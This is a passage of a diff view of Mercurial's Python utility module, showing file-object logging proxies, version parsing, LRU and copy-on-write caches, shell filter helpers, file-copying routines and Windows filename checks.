500 universal_newlines=newlines,
501 env=env)
502 return p.stdin, p.stdout, p.stderr, p
503
504 class fileobjectproxy(object):
505 """A proxy around file objects that tells a watcher when events occur.
506
507 This type is intended to only be used for testing purposes. Think hard
508 before using it in important code.
509 """
510 __slots__ = (
511 r'_orig',
512 r'_observer',
513 )
514
515 def __init__(self, fh, observer):
516 object.__setattr__(self, r'_orig', fh)
517 object.__setattr__(self, r'_observer', observer)
518
519 def __getattribute__(self, name):
520 ours = {
521 r'_observer',
522
523 # IOBase
524 r'close',
525 # closed if a property
526 r'fileno',
527 r'flush',
528 r'isatty',
529 r'readable',
530 r'readline',
531 r'readlines',
532 r'seek',
533 r'seekable',
534 r'tell',
535 r'truncate',
536 r'writable',
537 r'writelines',
538 # RawIOBase
539 r'read',
540 r'readall',
541 r'readinto',
542 r'write',
543 # BufferedIOBase
544 # raw is a property
545 r'detach',
546 # read defined above
547 r'read1',
548 # readinto defined above
549 # write defined above
550 }
551
552 # We only observe some methods.
553 if name in ours:
554 return object.__getattribute__(self, name)
555
556 return getattr(object.__getattribute__(self, r'_orig'), name)
557
558 def __delattr__(self, name):
559 return delattr(object.__getattribute__(self, r'_orig'), name)
560
561 def __setattr__(self, name, value):
562 return setattr(object.__getattribute__(self, r'_orig'), name, value)
563
564 def __iter__(self):
565 return object.__getattribute__(self, r'_orig').__iter__()
566
567 def _observedcall(self, name, *args, **kwargs):
568 # Call the original object.
569 orig = object.__getattribute__(self, r'_orig')
570 res = getattr(orig, name)(*args, **kwargs)
571
572 # Call a method on the observer of the same name with arguments
573 # so it can react, log, etc.
574 observer = object.__getattribute__(self, r'_observer')
575 fn = getattr(observer, name, None)
576 if fn:
577 fn(res, *args, **kwargs)
578
579 return res
580
581 def close(self, *args, **kwargs):
582 return object.__getattribute__(self, r'_observedcall')(
583 r'close', *args, **kwargs)
584
585 def fileno(self, *args, **kwargs):
586 return object.__getattribute__(self, r'_observedcall')(
587 r'fileno', *args, **kwargs)
588
589 def flush(self, *args, **kwargs):
590 return object.__getattribute__(self, r'_observedcall')(
591 r'flush', *args, **kwargs)
592
593 def isatty(self, *args, **kwargs):
594 return object.__getattribute__(self, r'_observedcall')(
595 r'isatty', *args, **kwargs)
596
597 def readable(self, *args, **kwargs):
598 return object.__getattribute__(self, r'_observedcall')(
599 r'readable', *args, **kwargs)
600
601 def readline(self, *args, **kwargs):
602 return object.__getattribute__(self, r'_observedcall')(
603 r'readline', *args, **kwargs)
604
605 def readlines(self, *args, **kwargs):
606 return object.__getattribute__(self, r'_observedcall')(
607 r'readlines', *args, **kwargs)
608
609 def seek(self, *args, **kwargs):
610 return object.__getattribute__(self, r'_observedcall')(
611 r'seek', *args, **kwargs)
612
613 def seekable(self, *args, **kwargs):
614 return object.__getattribute__(self, r'_observedcall')(
615 r'seekable', *args, **kwargs)
616
617 def tell(self, *args, **kwargs):
618 return object.__getattribute__(self, r'_observedcall')(
619 r'tell', *args, **kwargs)
620
621 def truncate(self, *args, **kwargs):
622 return object.__getattribute__(self, r'_observedcall')(
623 r'truncate', *args, **kwargs)
624
625 def writable(self, *args, **kwargs):
626 return object.__getattribute__(self, r'_observedcall')(
627 r'writable', *args, **kwargs)
628
629 def writelines(self, *args, **kwargs):
630 return object.__getattribute__(self, r'_observedcall')(
631 r'writelines', *args, **kwargs)
632
633 def read(self, *args, **kwargs):
634 return object.__getattribute__(self, r'_observedcall')(
635 r'read', *args, **kwargs)
636
637 def readall(self, *args, **kwargs):
638 return object.__getattribute__(self, r'_observedcall')(
639 r'readall', *args, **kwargs)
640
641 def readinto(self, *args, **kwargs):
642 return object.__getattribute__(self, r'_observedcall')(
643 r'readinto', *args, **kwargs)
644
645 def write(self, *args, **kwargs):
646 return object.__getattribute__(self, r'_observedcall')(
647 r'write', *args, **kwargs)
648
649 def detach(self, *args, **kwargs):
650 return object.__getattribute__(self, r'_observedcall')(
651 r'detach', *args, **kwargs)
652
653 def read1(self, *args, **kwargs):
654 return object.__getattribute__(self, r'_observedcall')(
655 r'read1', *args, **kwargs)
656
657 class observedbufferedinputpipe(bufferedinputpipe):
658 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
659
660 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
661 bypass ``fileobjectproxy``. Because of this, we need to make
662 ``bufferedinputpipe`` aware of these operations.
663
664 This variation of ``bufferedinputpipe`` can notify observers about
665 ``os.read()`` events. It also re-publishes other events, such as
666 ``read()`` and ``readline()``.
667 """
668 def _fillbuffer(self):
669 res = super(observedbufferedinputpipe, self)._fillbuffer()
670
671 fn = getattr(self._input._observer, r'osread', None)
672 if fn:
673 fn(res, _chunksize)
674
675 return res
676
677 # We use different observer methods because the operation isn't
678 # performed on the actual file object but on us.
679 def read(self, size):
680 res = super(observedbufferedinputpipe, self).read(size)
681
682 fn = getattr(self._input._observer, r'bufferedread', None)
683 if fn:
684 fn(res, size)
685
686 return res
687
688 def readline(self, *args, **kwargs):
689 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
690
691 fn = getattr(self._input._observer, r'bufferedreadline', None)
692 if fn:
693 fn(res)
694
695 return res
696
697 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
698 DATA_ESCAPE_MAP.update({
699 b'\\': b'\\\\',
700 b'\r': br'\r',
701 b'\n': br'\n',
702 })
703 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
704
705 def escapedata(s):
706 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
707
708 class fileobjectobserver(object):
709 """Logs file object activity."""
710 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
711 self.fh = fh
712 self.name = name
713 self.logdata = logdata
714 self.reads = reads
715 self.writes = writes
716
717 def _writedata(self, data):
718 if not self.logdata:
719 self.fh.write('\n')
720 return
721
722 # Simple case writes all data on a single line.
723 if b'\n' not in data:
724 self.fh.write(': %s\n' % escapedata(data))
725 return
726
727 # Data with newlines is written to multiple lines.
728 self.fh.write(':\n')
729 lines = data.splitlines(True)
730 for line in lines:
731 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
732
733 def read(self, res, size=-1):
734 if not self.reads:
735 return
736 # Python 3 can return None from reads at EOF instead of empty strings.
737 if res is None:
738 res = ''
739
740 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
741 self._writedata(res)
742
743 def readline(self, res, limit=-1):
744 if not self.reads:
745 return
746
747 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
748 self._writedata(res)
749
750 def write(self, res, data):
751 if not self.writes:
752 return
753
754 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
755 self._writedata(data)
756
757 def flush(self, res):
758 if not self.writes:
759 return
760
761 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
762
763 # For observedbufferedinputpipe.
764 def bufferedread(self, res, size):
765 self.fh.write('%s> bufferedread(%d) -> %d' % (
766 self.name, size, len(res)))
767 self._writedata(res)
768
769 def bufferedreadline(self, res):
770 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
771 self._writedata(res)
772
773 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
774 logdata=False):
775 """Turn a file object into a logging file object."""
776
777 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
778 logdata=logdata)
779 return fileobjectproxy(fh, observer)
780
781 def version():
782 """Return version information if available."""
783 try:
784 from . import __version__
785 return __version__.version
786 except ImportError:
787 return 'unknown'
788
789 def versiontuple(v=None, n=4):
790 """Parses a Mercurial version string into an N-tuple.
791
792 The version string to be parsed is specified with the ``v`` argument.
793 If it isn't defined, the current Mercurial version string will be parsed.
794
795 ``n`` can be 2, 3, or 4. Here is how some version strings map to
796 returned values:
797
798 >>> v = b'3.6.1+190-df9b73d2d444'
799 >>> versiontuple(v, 2)
800 (3, 6)
801 >>> versiontuple(v, 3)
802 (3, 6, 1)
803 >>> versiontuple(v, 4)
804 (3, 6, 1, '190-df9b73d2d444')
805
806 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
807 (3, 6, 1, '190-df9b73d2d444+20151118')
808
809 >>> v = b'3.6'
810 >>> versiontuple(v, 2)
811 (3, 6)
812 >>> versiontuple(v, 3)
813 (3, 6, None)
814 >>> versiontuple(v, 4)
815 (3, 6, None, None)
816
817 >>> v = b'3.9-rc'
818 >>> versiontuple(v, 2)
819 (3, 9)
820 >>> versiontuple(v, 3)
821 (3, 9, None)
822 >>> versiontuple(v, 4)
823 (3, 9, None, 'rc')
824
825 >>> v = b'3.9-rc+2-02a8fea4289b'
826 >>> versiontuple(v, 2)
827 (3, 9)
828 >>> versiontuple(v, 3)
829 (3, 9, None)
830 >>> versiontuple(v, 4)
831 (3, 9, None, 'rc+2-02a8fea4289b')
832 """
833 if not v:
834 v = version()
835 parts = remod.split('[\+-]', v, 1)
836 if len(parts) == 1:
837 vparts, extra = parts[0], None
838 else:
839 vparts, extra = parts
840
841 vints = []
842 for i in vparts.split('.'):
843 try:
844 vints.append(int(i))
845 except ValueError:
846 break
847 # (3, 6) -> (3, 6, None)
848 while len(vints) < 3:
849 vints.append(None)
850
851 if n == 2:
852 return (vints[0], vints[1])
853 if n == 3:
854 return (vints[0], vints[1], vints[2])
855 if n == 4:
856 return (vints[0], vints[1], vints[2], extra)
857
858 21 # used by parsedate
859 22 defaultdateformats = (
860 23 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
@@ -897,1413 +60,6 b' extendeddateformats = defaultdateformats'
897 60 "%b %Y",
898 61 )
899 62
900 def cachefunc(func):
901 '''cache the result of function calls'''
902 # XXX doesn't handle keywords args
903 if func.__code__.co_argcount == 0:
904 cache = []
905 def f():
906 if len(cache) == 0:
907 cache.append(func())
908 return cache[0]
909 return f
910 cache = {}
911 if func.__code__.co_argcount == 1:
912 # we gain a small amount of time because
913 # we don't need to pack/unpack the list
914 def f(arg):
915 if arg not in cache:
916 cache[arg] = func(arg)
917 return cache[arg]
918 else:
919 def f(*args):
920 if args not in cache:
921 cache[args] = func(*args)
922 return cache[args]
923
924 return f
925
926 class cow(object):
927 """helper class to make copy-on-write easier
928
929 Call preparewrite before doing any writes.
930 """
931
932 def preparewrite(self):
933 """call this before writes, return self or a copied new object"""
934 if getattr(self, '_copied', 0):
935 self._copied -= 1
936 return self.__class__(self)
937 return self
938
939 def copy(self):
940 """always do a cheap copy"""
941 self._copied = getattr(self, '_copied', 0) + 1
942 return self
943
944 class sortdict(collections.OrderedDict):
945 '''a simple sorted dictionary
946
947 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
948 >>> d2 = d1.copy()
949 >>> d2
950 sortdict([('a', 0), ('b', 1)])
951 >>> d2.update([(b'a', 2)])
952 >>> list(d2.keys()) # should still be in last-set order
953 ['b', 'a']
954 '''
955
956 def __setitem__(self, key, value):
957 if key in self:
958 del self[key]
959 super(sortdict, self).__setitem__(key, value)
960
961 if pycompat.ispypy:
962 # __setitem__() isn't called as of PyPy 5.8.0
963 def update(self, src):
964 if isinstance(src, dict):
965 src = src.iteritems()
966 for k, v in src:
967 self[k] = v
968
969 class cowdict(cow, dict):
970 """copy-on-write dict
971
972 Be sure to call d = d.preparewrite() before writing to d.
973
974 >>> a = cowdict()
975 >>> a is a.preparewrite()
976 True
977 >>> b = a.copy()
978 >>> b is a
979 True
980 >>> c = b.copy()
981 >>> c is a
982 True
983 >>> a = a.preparewrite()
984 >>> b is a
985 False
986 >>> a is a.preparewrite()
987 True
988 >>> c = c.preparewrite()
989 >>> b is c
990 False
991 >>> b is b.preparewrite()
992 True
993 """
994
995 class cowsortdict(cow, sortdict):
996 """copy-on-write sortdict
997
998 Be sure to call d = d.preparewrite() before writing to d.
999 """
1000
1001 class transactional(object):
1002 """Base class for making a transactional type into a context manager."""
1003 __metaclass__ = abc.ABCMeta
1004
1005 @abc.abstractmethod
1006 def close(self):
1007 """Successfully closes the transaction."""
1008
1009 @abc.abstractmethod
1010 def release(self):
1011 """Marks the end of the transaction.
1012
1013 If the transaction has not been closed, it will be aborted.
1014 """
1015
1016 def __enter__(self):
1017 return self
1018
1019 def __exit__(self, exc_type, exc_val, exc_tb):
1020 try:
1021 if exc_type is None:
1022 self.close()
1023 finally:
1024 self.release()
1025
1026 @contextlib.contextmanager
1027 def acceptintervention(tr=None):
1028 """A context manager that closes the transaction on InterventionRequired
1029
1030 If no transaction was provided, this simply runs the body and returns
1031 """
1032 if not tr:
1033 yield
1034 return
1035 try:
1036 yield
1037 tr.close()
1038 except error.InterventionRequired:
1039 tr.close()
1040 raise
1041 finally:
1042 tr.release()
1043
1044 @contextlib.contextmanager
1045 def nullcontextmanager():
1046 yield
1047
1048 class _lrucachenode(object):
1049 """A node in a doubly linked list.
1050
1051 Holds a reference to nodes on either side as well as a key-value
1052 pair for the dictionary entry.
1053 """
1054 __slots__ = (u'next', u'prev', u'key', u'value')
1055
1056 def __init__(self):
1057 self.next = None
1058 self.prev = None
1059
1060 self.key = _notset
1061 self.value = None
1062
1063 def markempty(self):
1064 """Mark the node as emptied."""
1065 self.key = _notset
1066
1067 class lrucachedict(object):
1068 """Dict that caches most recent accesses and sets.
1069
1070 The dict consists of an actual backing dict - indexed by original
1071 key - and a doubly linked circular list defining the order of entries in
1072 the cache.
1073
1074 The head node is the newest entry in the cache. If the cache is full,
1075 we recycle head.prev and make it the new head. Cache accesses result in
1076 the node being moved to before the existing head and being marked as the
1077 new head node.
1078 """
1079 def __init__(self, max):
1080 self._cache = {}
1081
1082 self._head = head = _lrucachenode()
1083 head.prev = head
1084 head.next = head
1085 self._size = 1
1086 self._capacity = max
1087
1088 def __len__(self):
1089 return len(self._cache)
1090
1091 def __contains__(self, k):
1092 return k in self._cache
1093
1094 def __iter__(self):
1095 # We don't have to iterate in cache order, but why not.
1096 n = self._head
1097 for i in range(len(self._cache)):
1098 yield n.key
1099 n = n.next
1100
1101 def __getitem__(self, k):
1102 node = self._cache[k]
1103 self._movetohead(node)
1104 return node.value
1105
1106 def __setitem__(self, k, v):
1107 node = self._cache.get(k)
1108 # Replace existing value and mark as newest.
1109 if node is not None:
1110 node.value = v
1111 self._movetohead(node)
1112 return
1113
1114 if self._size < self._capacity:
1115 node = self._addcapacity()
1116 else:
1117 # Grab the last/oldest item.
1118 node = self._head.prev
1119
1120 # At capacity. Kill the old entry.
1121 if node.key is not _notset:
1122 del self._cache[node.key]
1123
1124 node.key = k
1125 node.value = v
1126 self._cache[k] = node
1127 # And mark it as newest entry. No need to adjust order since it
1128 # is already self._head.prev.
1129 self._head = node
1130
1131 def __delitem__(self, k):
1132 node = self._cache.pop(k)
1133 node.markempty()
1134
1135 # Temporarily mark as newest item before re-adjusting head to make
1136 # this node the oldest item.
1137 self._movetohead(node)
1138 self._head = node.next
1139
1140 # Additional dict methods.
1141
1142 def get(self, k, default=None):
1143 try:
1144 return self._cache[k].value
1145 except KeyError:
1146 return default
1147
1148 def clear(self):
1149 n = self._head
1150 while n.key is not _notset:
1151 n.markempty()
1152 n = n.next
1153
1154 self._cache.clear()
1155
1156 def copy(self):
1157 result = lrucachedict(self._capacity)
1158 n = self._head.prev
1159 # Iterate in oldest-to-newest order, so the copy has the right ordering
1160 for i in range(len(self._cache)):
1161 result[n.key] = n.value
1162 n = n.prev
1163 return result
1164
1165 def _movetohead(self, node):
1166 """Mark a node as the newest, making it the new head.
1167
1168 When a node is accessed, it becomes the freshest entry in the LRU
1169 list, which is denoted by self._head.
1170
1171 Visually, let's make ``N`` the new head node (* denotes head):
1172
1173 previous/oldest <-> head <-> next/next newest
1174
1175 ----<->--- A* ---<->-----
1176 | |
1177 E <-> D <-> N <-> C <-> B
1178
1179 To:
1180
1181 ----<->--- N* ---<->-----
1182 | |
1183 E <-> D <-> C <-> B <-> A
1184
1185 This requires the following moves:
1186
1187 C.next = D (node.prev.next = node.next)
1188 D.prev = C (node.next.prev = node.prev)
1189 E.next = N (head.prev.next = node)
1190 N.prev = E (node.prev = head.prev)
1191 N.next = A (node.next = head)
1192 A.prev = N (head.prev = node)
1193 """
1194 head = self._head
1195 # C.next = D
1196 node.prev.next = node.next
1197 # D.prev = C
1198 node.next.prev = node.prev
1199 # N.prev = E
1200 node.prev = head.prev
1201 # N.next = A
1202 # It is tempting to do just "head" here, however if node is
1203 # adjacent to head, this will do bad things.
1204 node.next = head.prev.next
1205 # E.next = N
1206 node.next.prev = node
1207 # A.prev = N
1208 node.prev.next = node
1209
1210 self._head = node
1211
1212 def _addcapacity(self):
1213 """Add a node to the circular linked list.
1214
1215 The new node is inserted before the head node.
1216 """
1217 head = self._head
1218 node = _lrucachenode()
1219 head.prev.next = node
1220 node.prev = head.prev
1221 node.next = head
1222 head.prev = node
1223 self._size += 1
1224 return node
1225
1226 def lrucachefunc(func):
1227 '''cache most recent results of function calls'''
1228 cache = {}
1229 order = collections.deque()
1230 if func.__code__.co_argcount == 1:
1231 def f(arg):
1232 if arg not in cache:
1233 if len(cache) > 20:
1234 del cache[order.popleft()]
1235 cache[arg] = func(arg)
1236 else:
1237 order.remove(arg)
1238 order.append(arg)
1239 return cache[arg]
1240 else:
1241 def f(*args):
1242 if args not in cache:
1243 if len(cache) > 20:
1244 del cache[order.popleft()]
1245 cache[args] = func(*args)
1246 else:
1247 order.remove(args)
1248 order.append(args)
1249 return cache[args]
1250
1251 return f
1252
1253 class propertycache(object):
1254 def __init__(self, func):
1255 self.func = func
1256 self.name = func.__name__
1257 def __get__(self, obj, type=None):
1258 result = self.func(obj)
1259 self.cachevalue(obj, result)
1260 return result
1261
1262 def cachevalue(self, obj, value):
1263 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1264 obj.__dict__[self.name] = value
1265
1266 def clearcachedproperty(obj, prop):
1267 '''clear a cached property value, if one has been set'''
1268 if prop in obj.__dict__:
1269 del obj.__dict__[prop]
1270
1271 def pipefilter(s, cmd):
1272 '''filter string S through command CMD, returning its output'''
1273 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1274 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1275 pout, perr = p.communicate(s)
1276 return pout
1277
1278 def tempfilter(s, cmd):
1279 '''filter string S through a pair of temporary files with CMD.
1280 CMD is used as a template to create the real command to be run,
1281 with the strings INFILE and OUTFILE replaced by the real names of
1282 the temporary files generated.'''
1283 inname, outname = None, None
1284 try:
1285 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1286 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1287 fp.write(s)
1288 fp.close()
1289 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1290 os.close(outfd)
1291 cmd = cmd.replace('INFILE', inname)
1292 cmd = cmd.replace('OUTFILE', outname)
1293 code = os.system(cmd)
1294 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1295 code = 0
1296 if code:
1297 raise Abort(_("command '%s' failed: %s") %
1298 (cmd, explainexit(code)))
1299 return readfile(outname)
1300 finally:
1301 try:
1302 if inname:
1303 os.unlink(inname)
1304 except OSError:
1305 pass
1306 try:
1307 if outname:
1308 os.unlink(outname)
1309 except OSError:
1310 pass
1311
1312 filtertable = {
1313 'tempfile:': tempfilter,
1314 'pipe:': pipefilter,
1315 }
1316
1317 def filter(s, cmd):
1318 "filter a string through a command that transforms its input to its output"
1319 for name, fn in filtertable.iteritems():
1320 if cmd.startswith(name):
1321 return fn(s, cmd[len(name):].lstrip())
1322 return pipefilter(s, cmd)
1323
1324 def binary(s):
1325 """return true if a string is binary data"""
1326 return bool(s and '\0' in s)
1327
1328 def increasingchunks(source, min=1024, max=65536):
1329 '''return no less than min bytes per chunk while data remains,
1330 doubling min after each chunk until it reaches max'''
1331 def log2(x):
1332 if not x:
1333 return 0
1334 i = 0
1335 while x:
1336 x >>= 1
1337 i += 1
1338 return i - 1
1339
1340 buf = []
1341 blen = 0
1342 for chunk in source:
1343 buf.append(chunk)
1344 blen += len(chunk)
1345 if blen >= min:
1346 if min < max:
1347 min = min << 1
1348 nmin = 1 << log2(blen)
1349 if nmin > min:
1350 min = nmin
1351 if min > max:
1352 min = max
1353 yield ''.join(buf)
1354 blen = 0
1355 buf = []
1356 if buf:
1357 yield ''.join(buf)
1358
1359 Abort = error.Abort
1360
1361 def always(fn):
1362 return True
1363
1364 def never(fn):
1365 return False
1366
1367 def nogc(func):
1368 """disable garbage collector
1369
1370 Python's garbage collector triggers a GC each time a certain number of
1371 container objects (the number being defined by gc.get_threshold()) are
1372 allocated even when marked not to be tracked by the collector. Tracking has
1373 no effect on when GCs are triggered, only on what objects the GC looks
1374 into. As a workaround, disable GC while building complex (huge)
1375 containers.
1376
1377 This garbage collector issue have been fixed in 2.7. But it still affect
1378 CPython's performance.
1379 """
1380 def wrapper(*args, **kwargs):
1381 gcenabled = gc.isenabled()
1382 gc.disable()
1383 try:
1384 return func(*args, **kwargs)
1385 finally:
1386 if gcenabled:
1387 gc.enable()
1388 return wrapper
1389
1390 if pycompat.ispypy:
1391 # PyPy runs slower with gc disabled
1392 nogc = lambda x: x
1393
1394 def pathto(root, n1, n2):
1395 '''return the relative path from one place to another.
1396 root should use os.sep to separate directories
1397 n1 should use os.sep to separate directories
1398 n2 should use "/" to separate directories
1399 returns an os.sep-separated path.
1400
1401 If n1 is a relative path, it's assumed it's
1402 relative to root.
1403 n2 should always be relative to root.
1404 '''
1405 if not n1:
1406 return localpath(n2)
1407 if os.path.isabs(n1):
1408 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1409 return os.path.join(root, localpath(n2))
1410 n2 = '/'.join((pconvert(root), n2))
1411 a, b = splitpath(n1), n2.split('/')
1412 a.reverse()
1413 b.reverse()
1414 while a and b and a[-1] == b[-1]:
1415 a.pop()
1416 b.pop()
1417 b.reverse()
1418 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1419
1420 def mainfrozen():
1421 """return True if we are a frozen executable.
1422
1423 The code supports py2exe (most common, Windows only) and tools/freeze
1424 (portable, not much used).
1425 """
1426 return (safehasattr(sys, "frozen") or # new py2exe
1427 safehasattr(sys, "importers") or # old py2exe
1428 imp.is_frozen(u"__main__")) # tools/freeze
1429
1430 # the location of data files matching the source code
1431 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1432 # executable version (py2exe) doesn't support __file__
1433 datapath = os.path.dirname(pycompat.sysexecutable)
1434 else:
1435 datapath = os.path.dirname(pycompat.fsencode(__file__))
1436
1437 i18n.setdatapath(datapath)
1438
1439 _hgexecutable = None
1440
1441 def hgexecutable():
1442 """return location of the 'hg' executable.
1443
1444 Defaults to $HG or 'hg' in the search path.
1445 """
1446 if _hgexecutable is None:
1447 hg = encoding.environ.get('HG')
1448 mainmod = sys.modules[pycompat.sysstr('__main__')]
1449 if hg:
1450 _sethgexecutable(hg)
1451 elif mainfrozen():
1452 if getattr(sys, 'frozen', None) == 'macosx_app':
1453 # Env variable set by py2app
1454 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1455 else:
1456 _sethgexecutable(pycompat.sysexecutable)
1457 elif (os.path.basename(
1458 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1459 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1460 else:
1461 exe = findexe('hg') or os.path.basename(sys.argv[0])
1462 _sethgexecutable(exe)
1463 return _hgexecutable
1464
1465 def _sethgexecutable(path):
1466 """set location of the 'hg' executable"""
1467 global _hgexecutable
1468 _hgexecutable = path
1469
1470 def _isstdout(f):
1471 fileno = getattr(f, 'fileno', None)
1472 try:
1473 return fileno and fileno() == sys.__stdout__.fileno()
1474 except io.UnsupportedOperation:
1475 return False # fileno() raised UnsupportedOperation
1476
1477 def shellenviron(environ=None):
1478 """return environ with optional override, useful for shelling out"""
1479 def py2shell(val):
1480 'convert python object into string that is useful to shell'
1481 if val is None or val is False:
1482 return '0'
1483 if val is True:
1484 return '1'
1485 return pycompat.bytestr(val)
1486 env = dict(encoding.environ)
1487 if environ:
1488 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1489 env['HG'] = hgexecutable()
1490 return env
1491
1492 def system(cmd, environ=None, cwd=None, out=None):
1493 '''enhanced shell command execution.
1494 run with environment maybe modified, maybe in different dir.
1495
1496 if out is specified, it is assumed to be a file-like object that has a
1497 write() method. stdout and stderr will be redirected to out.'''
1498 try:
1499 stdout.flush()
1500 except Exception:
1501 pass
1502 cmd = quotecommand(cmd)
1503 env = shellenviron(environ)
1504 if out is None or _isstdout(out):
1505 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1506 env=env, cwd=cwd)
1507 else:
1508 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1509 env=env, cwd=cwd, stdout=subprocess.PIPE,
1510 stderr=subprocess.STDOUT)
1511 for line in iter(proc.stdout.readline, ''):
1512 out.write(line)
1513 proc.wait()
1514 rc = proc.returncode
1515 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1516 rc = 0
1517 return rc
1518
1519 def checksignature(func):
1520 '''wrap a function with code to check for calling errors'''
1521 def check(*args, **kwargs):
1522 try:
1523 return func(*args, **kwargs)
1524 except TypeError:
1525 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1526 raise error.SignatureError
1527 raise
1528
1529 return check
1530
1531 # a whilelist of known filesystems where hardlink works reliably
1532 _hardlinkfswhitelist = {
1533 'btrfs',
1534 'ext2',
1535 'ext3',
1536 'ext4',
1537 'hfs',
1538 'jfs',
1539 'NTFS',
1540 'reiserfs',
1541 'tmpfs',
1542 'ufs',
1543 'xfs',
1544 'zfs',
1545 }
1546
1547 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1548 '''copy a file, preserving mode and optionally other stat info like
1549 atime/mtime
1550
1551 checkambig argument is used with filestat, and is useful only if
1552 destination file is guarded by any lock (e.g. repo.lock or
1553 repo.wlock).
1554
1555 copystat and checkambig should be exclusive.
1556 '''
1557 assert not (copystat and checkambig)
1558 oldstat = None
1559 if os.path.lexists(dest):
1560 if checkambig:
1561 oldstat = checkambig and filestat.frompath(dest)
1562 unlink(dest)
1563 if hardlink:
1564 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1565 # unless we are confident that dest is on a whitelisted filesystem.
1566 try:
1567 fstype = getfstype(os.path.dirname(dest))
1568 except OSError:
1569 fstype = None
1570 if fstype not in _hardlinkfswhitelist:
1571 hardlink = False
1572 if hardlink:
1573 try:
1574 oslink(src, dest)
1575 return
1576 except (IOError, OSError):
1577 pass # fall back to normal copy
1578 if os.path.islink(src):
1579 os.symlink(os.readlink(src), dest)
1580 # copytime is ignored for symlinks, but in general copytime isn't needed
1581 # for them anyway
1582 else:
1583 try:
1584 shutil.copyfile(src, dest)
1585 if copystat:
1586 # copystat also copies mode
1587 shutil.copystat(src, dest)
1588 else:
1589 shutil.copymode(src, dest)
1590 if oldstat and oldstat.stat:
1591 newstat = filestat.frompath(dest)
1592 if newstat.isambig(oldstat):
1593 # stat of copied file is ambiguous to original one
1594 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1595 os.utime(dest, (advanced, advanced))
1596 except shutil.Error as inst:
1597 raise Abort(str(inst))
1598
1599 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1600 """Copy a directory tree using hardlinks if possible."""
1601 num = 0
1602
1603 gettopic = lambda: hardlink and _('linking') or _('copying')
1604
1605 if os.path.isdir(src):
1606 if hardlink is None:
1607 hardlink = (os.stat(src).st_dev ==
1608 os.stat(os.path.dirname(dst)).st_dev)
1609 topic = gettopic()
1610 os.mkdir(dst)
1611 for name, kind in listdir(src):
1612 srcname = os.path.join(src, name)
1613 dstname = os.path.join(dst, name)
1614 def nprog(t, pos):
1615 if pos is not None:
1616 return progress(t, pos + num)
1617 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1618 num += n
1619 else:
1620 if hardlink is None:
1621 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1622 os.stat(os.path.dirname(dst)).st_dev)
1623 topic = gettopic()
1624
1625 if hardlink:
1626 try:
1627 oslink(src, dst)
1628 except (IOError, OSError):
1629 hardlink = False
1630 shutil.copy(src, dst)
1631 else:
1632 shutil.copy(src, dst)
1633 num += 1
1634 progress(topic, num)
1635 progress(topic, None)
1636
1637 return hardlink, num
1638
1639 _winreservednames = {
1640 'con', 'prn', 'aux', 'nul',
1641 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1642 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1643 }
1644 _winreservedchars = ':*?"<>|'
1645 def checkwinfilename(path):
1646 r'''Check that the base-relative path is a valid filename on Windows.
1647 Returns None if the path is ok, or a UI string describing the problem.
1648
1649 >>> checkwinfilename(b"just/a/normal/path")
1650 >>> checkwinfilename(b"foo/bar/con.xml")
1651 "filename contains 'con', which is reserved on Windows"
1652 >>> checkwinfilename(b"foo/con.xml/bar")
1653 "filename contains 'con', which is reserved on Windows"
1654 >>> checkwinfilename(b"foo/bar/xml.con")
1655 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1656 "filename contains 'AUX', which is reserved on Windows"
1657 >>> checkwinfilename(b"foo/bar/bla:.txt")
1658 "filename contains ':', which is reserved on Windows"
1659 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1660 "filename contains '\\x07', which is invalid on Windows"
1661 >>> checkwinfilename(b"foo/bar/bla ")
1662 "filename ends with ' ', which is not allowed on Windows"
1663 >>> checkwinfilename(b"../bar")
1664 >>> checkwinfilename(b"foo\\")
1665 "filename ends with '\\', which is invalid on Windows"
